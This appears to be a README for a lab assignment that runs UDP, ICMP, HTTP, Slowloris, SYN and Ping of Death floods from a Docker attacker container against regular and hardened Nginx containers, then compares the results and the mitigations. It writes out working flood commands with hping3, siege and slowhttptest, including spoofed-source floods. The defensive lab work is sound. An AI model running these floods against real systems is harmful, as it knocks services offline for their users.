# 14. DDoS Attacks

## Assignment
Setup two docker containers:
1. Attacker container - there you need to write scripts that will implement 6 attacks (UDP Flood, ICMP flood, HTTP flood, Slowloris, SYN flood,  Ping of Death)
2. Defender container - ubuntu & nginx with simple website
3. Try to implement protection on Defender container
4. Launch attacker scripts and examine you protection

## Set up one attacker container and two Nginx containers:
```
docker-compose up
docker-compose -f docker-compose.attacker.yml run --rm attacker bash
cd 02_resource_monitoring_systems
docker-compose -f docker-compose.monitor_nginx.yml up
```

Check each container responds with an image:
- [http://localhost:8080/public/img.png](http://localhost:8080/public/img.png)
- [http://localhost:8081/public/img.png](http://localhost:8081/public/img.png)

Log in the telergaf ([http://localhost:8086/](http://localhost:8086/), `telegraf/metricsmetricsmetricsmetrics`) container to see the metrics.

### UDP Flood
Knowing that Nginx server exposes 6000 port for udp connections, let's try UDP flood spoofing the attacker's IP address:
```bash
hping3 --flood --udp --spoof 192.168.1.254 -S nginx-regular -p 6000
```
Result:
```bash
curl http://localhost:8080/public/img.png -v --max-time 3
*   Trying ::1...
* TCP_NODELAY set
* Connected to localhost (::1) port 8080 (#0)
> GET /public/img.png HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.64.1
> Accept: */*
>
* Operation timed out after 3002 milliseconds with 0 bytes received
* Closing connection 0
curl: (28) Operation timed out after 3002 milliseconds with 0 bytes received
```
As we see, UDP connections made the server unavailable for HTTP requests.
The protected server does not have any UDP port opened, therefore the same attack does not impact it.

### ICMP flood
An Internet Control Message Protocol (ICMP) flood DDoS attack. An attacker attempts to overwhelm a targeted device with ICMP echo-requests (pings)

We've installed `ufw` firewall, forbidden all ports except 22 and 80/tcp in IP-tables, and set icmp-protective `sysctls` preferences in docker-compose file.

Let's attack `nginx-regular`
```bash
hping3 --flood --rand-source -1 -p 80 nginx-regular
804602 packets transmitted, 0 packets received, 100% packet loss
```
and `nginx-under-defence`
```bash
hping3 --flood --rand-source -1 -p 80 nginx-under-defence
6532911 packets transmitted, 0 packets received, 100% packet loss
```

To display a result, here is an InfluxDB Query:
```bash
from(bucket: "telegraf_bucket")
  |> range(start: v.timeRangeStart, stop: v.timeRangeStop)
  |> filter(fn: (r) => r["_measurement"] == "net")
  |> filter(fn: (r) => r["_field"] == "icmp_inmsgs" or r["_field"] == "icmp_outmsgs")
  |> filter(fn: (r) => r["host"] == "nginx-regular" or r["host"] == "nginx-under-defence")
  |> aggregateWindow(every: v.windowPeriod, fn: mean, createEmpty: false)
  |> yield(name: "mean")
```

<img src="img/icmp_flood.png" alt="" width="500"/>

On the plot we can see the difference between `nginx-under-defence` and `nginx-regular` in a way how many ICMP messages they handle. As it is shown, the defended server

### HTTP flood
```bash
siege http://nginx-regular/public/img.png -c255 -t2m -iv

{       "transactions":                        43133,
        "availability":                       100.00,
        "elapsed_time":                       119.67,
        "data_transferred":                   481.32,
        "response_time":                        0.70,
        "transaction_rate":                   360.43,
        "throughput":                           4.02,
        "concurrency":                        253.87,
        "successful_transactions":             43133,
        "failed_transactions":                     0,
        "longest_transaction":                  1.45,
        "shortest_transaction":                 0.01
}
```
As we can see, the availability is 100%, therefore the server processes all the requests. We need to limit requests number so that one client does not undermine the availability for all the others. We've set `rate=120r/m;` for Nginx under defence. Let's check how it works.
```bash
siege http://nginx-under-defence/public/img.png -c255 -t2m -iv

{       "transactions":                            6,
        "availability":                         0.47,
        "elapsed_time":                         3.24,
        "data_transferred":                     0.31,
        "response_time":                      119.14,
        "transaction_rate":                     1.85,
        "throughput":                           0.09,
        "concurrency":                        220.63,
        "successful_transactions":                 6,
        "failed_transactions":                  1277,
        "longest_transaction":                  0.97,
        "shortest_transaction":                 0.01
}
```
Now availability is only 0.47. The server cut the client down after 6 requests.

### Slowloris
Nginx is configured to have 1000 worker connections. Let's try to perform 1000 connections by increasing them by 200 per second.

```bash
slowhttptest -o app/artifacts/slowhttp -t GET -u http://nginx-regular/public/img.png -x 24 -p 3 -c 1000 -Hg -i 10 -r 200
```
Results: the server gets unavailable

<img src="img/slow_headers.png" alt="Search" width="200"/>
<img src="img/slowloris_metrics_regular.png" alt="Search" width="200"/>

Now let's check the second server, which is configred to wait for 5s at most between client body/client header writes:

```bash
slowhttptest -o app/artifacts/slowhttp -t GET -u http://nginx-under-defence/public/img.png -x 24 -p 3 -c 1000 -Hg -i 10 -r 200

slow HTTP test status on 10th second:

initializing:        0
pending:             0
connected:           282
error:               0
closed:              718
service available:   YES
Sat Jan  1 19:02:47 2022:
Test ended on 11th second
Exit status: No open connections left
```
As we can see, the defended server managed to survive this attack, since the attacker ran out of the available connections.

### SYN flood [non-reproducible]
```bash
hping3 -c 15000 -d 120 --syn -w 64 -p 80 --flood --rand-source 172.16.200.20
898943 packets transmitted, 0 packets received, 100% packet loss
```
This has no affect on the server. I've tried it with a remote machine, and with local docker.

### Ping of Death [non-reproducible]
```bash
fping -b 65500 nginx-regular
fping: data size 65500 not valid, must be lower than 65488
```
Basically, the Ping of Death is an antiquated attach which does not affect modern machines.

## References
- [Official Kali Linux Docker Images Released](https://www.kali.org/blog/official-kali-linux-docker-images/)
- [Slowhttptest](https://www.kali.org/tools/slowhttptest/)
- [How to monitor NGinx with Telegraf](https://blog.opstree.com/2021/11/09/nginx-monitoring-using-telegraf-prometheus-grafana/)
- [10 hping3 examples in Kali Linux a complete Guide for beginners](https://www.cyberpratibha.com/blog/scan-network-using-packet-assembleranalyzer-hping3-in-kali-linux/)
- [What is Distributed Denial of Service (DDoS)?](https://www.nginx.com/resources/glossary/distributed-denial-of-service/)
- [Mitigating DDoS Attacks with NGINX and NGINX Plus](https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/)
- [DDoS Beasts and How to Fight Them](https://www.nginx.com/wp-content/uploads/2018/11/NGINX-Conf-2018-slides_Gavrichenkov-DDoS-beasts.pdf)
- [Denial-of-Service Attack (DoS)](https://www.blackmoreops.com/2015/04/21/denial-of-service-attack-dos-using-hping3-with-spoofed-ip-in-kali-linux/)
- [wireshark](https://www.wireshark.org/)
- [DDOS-атаками на http-сервер](https://firstvds.ru/technology/kratkoe-rukovodstvo-po-borbe-s-ddos-atakami-na-http-server)
- [Server configuration example](https://skeletor.org.ua/?p=4078)
- [Top 25 Nginx Web Server Best Security Practices](https://www.cyberciti.biz/tips/linux-unix-bsd-nginx-webserver-security.html)
- [How to stop ICMP ping flood attack (DOS) on Linux](https://www.golinuxcloud.com/prevent-icmp-ping-flood-attack-linux/)
- [Attacks to be performed Using Hping3 (Packet Crafting)](https://ravi73079.medium.com/attacks-to-be-performed-using-hping3-packet-crafting-98bc25584745)

## Questions
1. `worker_connections` is 1000, but worker_processes is 2. Why slowloris makes Nginx down on 1000 parallel connections, not 2x1000?
